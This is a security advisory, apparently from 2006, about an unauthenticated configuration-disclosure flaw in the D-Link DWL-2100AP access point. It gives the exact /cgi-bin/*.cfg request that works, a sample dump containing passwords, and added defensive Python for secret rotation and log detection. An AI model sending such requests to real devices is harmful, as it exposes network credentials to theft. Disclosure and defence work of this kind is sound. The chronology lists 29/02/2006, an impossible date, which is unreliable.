D-Link DWL-2100AP Exposure of Configuration Files
Thursday, 08 June 2006

ADVISORY/0206 - D-Link Wireless Access-Point (DWL-2100ap)


PRIORITY: HIGH

 

II - INTRODUCTION:
----------------------

D-Link AirPlus XtremeG 2.4GHz Wireless Access Point, 54Mbps/108Mbps (802.11g):

D-Link, the industry pioneer in wireless networking, introduces a performance
breakthrough in wireless connectivity – D-Link AirPlus Xtreme G™ series of
high-speed devices now capable of delivering transfer rates up to 15x faster
than the standard 802.11b with the new D-Link 108G. With the new AirPlus Xtreme
G DWL-2100AP Wireless Access Point, D-Link sets a new standard for wireless access
points.

The D-Link DWL-2100ap is one of the most popular access points in the world.


III - DESCRIPTION:
------------------

During an intrusion project (pen-test), Intruders Tiger Team Security identified a
previously unknown vulnerability in the D-Link DWL-2100ap access point that allows an
attacker to read the device's configuration without authenticating to the web server.

Extremely sensitive information is available in the configuration of the D-Link
DWL-2100ap access point, for example:

- User and password used to manage the device.
- Password used in WEP and WPA.
- SSID, IP, subnet mask, MAC Address filters, etc.


IV - ANALYSIS:
--------------

An HTTP request to the /cgi-bin/ directory makes the web server return error 404 (Page not found).

An HTTP request to /cgi-bin/AnyFile.htm also makes the web server return error 404 (Page not found).

However, an HTTP request for any file name in the /cgi-bin/ directory with a .cfg extension
returns the entire device configuration.


For example, making the following request:

http://dlink-DWL-2100ap/cgi-bin/Intruders.cfg

The result would be equivalent to the following:

# Copyright (c) 2002 Atheros Communications, Inc., All Rights Reserved
# DO NOT EDIT -- This configuration file is automatically generated
magic Ar52xxAP
fwc: 34
login admin
DHCPServer
Eth_Acl
nameaddr
domainsuffix
IP_Addr 10.0.0.30
IP_Mask 255.0.0.0
Gateway_Addr 10.0.0.1
RADIUSaddr
RADIUSport 1812
RADIUSsecret
password IntrudersTest
passphrase
wlan1 passphrase AnewBadPassPhrase
# Several lines removed.
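
For incident response after such a dump has been exposed, the following added example (not part of the original advisory) parses the "key value" format shown above and lists which cleartext secrets must be rotated, reporting names only. The sample is an abridged copy of the dump above; the `wlan<N>` scope handling and the reading of `password` as the management password are assumptions based on that dump.

```python
import re

# Keys holding secrets, taken from the sample dump in this advisory; real dumps
# have more lines ("Several lines removed"), so extend this set as needed.
SECRET_KEYS = {"password", "passphrase", "RADIUSsecret"}

# Abridged copy of the dump shown in the advisory, embedded to run offline.
SAMPLE_DUMP = """\
# DO NOT EDIT -- This configuration file is automatically generated
magic Ar52xxAP
fwc: 34
login admin
IP_Addr 10.0.0.30
RADIUSport 1812
RADIUSsecret
password IntrudersTest
passphrase
wlan1 passphrase AnewBadPassPhrase
"""

def parse_config(text):
    """Return (scope, key, value) for every line that carries a value."""
    entries = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        parts = line.split(None, 2)
        if re.fullmatch(r"wlan\d+", parts[0]) and len(parts) >= 2:
            # Per-interface form (assumed general): "wlan1 passphrase <value>"
            scope, key = parts[0], parts[1]
            value = parts[2] if len(parts) == 3 else ""
        else:
            scope, key = "global", parts[0].rstrip(":")
            value = line.split(None, 1)[1] if len(parts) > 1 else ""
        if value:  # a bare key such as "RADIUSsecret" exposes nothing
            entries.append((scope, key, value))
    return entries

def secrets_to_rotate(text):
    """Names (never values) of the cleartext secrets present in a dump."""
    return sorted(f"{s}.{k}" for s, k, _ in parse_config(text) if k in SECRET_KEYS)

def uses_factory_login(text):
    """True when the login is 'admin' and no management password is set."""
    cfg = {(s, k): v for s, k, v in parse_config(text)}
    return cfg.get(("global", "login")) == "admin" and ("global", "password") not in cfg

if __name__ == "__main__":
    print(secrets_to_rotate(SAMPLE_DUMP), uses_factory_login(SAMPLE_DUMP))
```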

The D-Link DWL-2100ap access point does not allow the web server to be disabled, nor does it
have options to filter ports.

Remember that the D-Link DWL-2100ap access point ships configured with a default user /
password (user: admin and no password).
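
Because the web server cannot be disabled, watching for the request pattern described in this section is one of the few controls left on unpatched devices. The following is an added example, not part of the original advisory: it scans Common Log Format lines for requests to any .cfg name under /cgi-bin/ and separates likely disclosures from probes. The log source (a proxy or sensor in front of the access point), the sample lines, and the rule that a 200 response with a body means disclosure are assumptions.

```python
import re
from urllib.parse import unquote, urlsplit

# Common Log Format, as written by a proxy or sensor in front of the AP (assumed).
LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[[^\]]+\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+)[^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)
# Any file name directly under /cgi-bin/ with a .cfg extension.
CFG_RE = re.compile(r"^/cgi-bin/[^/]*\.cfg$", re.IGNORECASE)

# Constructed sample lines (documentation addresses, invented file names).
SAMPLE_LOG = [
    '192.0.2.10 - - [08/Jun/2006:10:00:01 +0000] "GET /cgi-bin/ HTTP/1.0" 404 120',
    '192.0.2.10 - - [08/Jun/2006:10:00:02 +0000] "GET /cgi-bin/status.htm HTTP/1.0" 404 120',
    '192.0.2.10 - - [08/Jun/2006:10:00:03 +0000] "GET /cgi-bin/a%2Ecfg?x=1 HTTP/1.0" 200 4096',
    '198.51.100.7 - - [08/Jun/2006:11:30:00 +0000] "GET /cgi-bin/backup.CFG HTTP/1.0" 404 120',
]

def find_cfg_requests(lines):
    """Return (source, decoded_path, verdict) for each .cfg request seen.

    The path is taken without its query string and percent-decoded before
    matching, so encoded or mixed-case variants of the extension are caught.
    """
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a request line in the expected format
        path = unquote(urlsplit(m["target"]).path)
        if not CFG_RE.match(path):
            continue
        size = m["size"]
        # Assumption: a 200 with a non-empty body means the config was served.
        leaked = m["status"] == "200" and size.isdigit() and int(size) > 0
        hits.append((m["src"], path, "disclosed" if leaked else "probe"))
    return hits

if __name__ == "__main__":
    for src, path, verdict in find_cfg_requests(SAMPLE_LOG):
        print(f"{verdict:9} {src} {path}")
```

Any source reported as "disclosed" should trigger rotation of the credentials held in the device configuration.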

V. DETECTION:
-------------

Intruders Tiger Team Security confirmed the existence of this vulnerability in all firmware
versions tested, including the latest version, 2.10na.

Other D-Link access point models may also be vulnerable.


VI. SUGGESTION:
---------------


D-Link company:


1 - Use strong cookies to guarantee that only authorized users get access to the configuration.

2 - Store sensitive configuration values such as password(s) as hash(es).

3 - Allow firewall policies and rules to be created to filter port(s) and IP(s).

4 - Require the user to change the default user/password on the first logon, and do not allow
the password to be changed back to the last one used.

5 - Use HTTP with SSL (HTTPS).

6 - Contract companies specialized in pen-testing and security auditing to validate the
security of D-Link products.


D-Link customers:


1 - Upgrade the firmware of the D-Link DWL-2100ap access point.
The direct download link is http://www.dlinkbrasil.com.br/internet/downloads/Wireless/DWL-2100AP/DWL2100AP-firmware-v210na-r0343.tfp


VII - CHRONOLOGY:
-----------------

11/02/2006 - Vulnerability discovered during a pen-test.
15/02/2006 - D-Link World Wide Team contacted.
17/02/2006 - No response.
18/02/2006 - D-Link World Wide Team re-contacted.
24/02/2006 - No response.
25/02/2006 - D-Link World Wide Team, last contact attempt.
29/02/2006 - No response.
29/02/2006 - D-Link Brazil Team contacted.
02/03/2006 - No response.
03/03/2006 - D-Link Brazil Team re-contacted.
06/03/2006 - D-Link Brazil Team responded.
09/03/2006 - Patch created.
14/03/2006 - Patch added to D-Link Brazil download site.
06/06/2006 - Advisory published.


VIII - CREDITS:
---------------

Wendel Guglielmetti Henrique and Intruders Tiger Team Security discovered this vulnerability.

Thanks to Glaudson Ocampos (Intruders Tiger Team Security), Waldemar Nehgme, João
Arquimedes (Security Open Source) and Ricardo N. Ferreira (Security Open Source).

Visit our website:

http://www.intruders.com.br/
http://www.intruders.org.br/


Original Advisory:
http://www.intruders.org.br/adv0206en.html  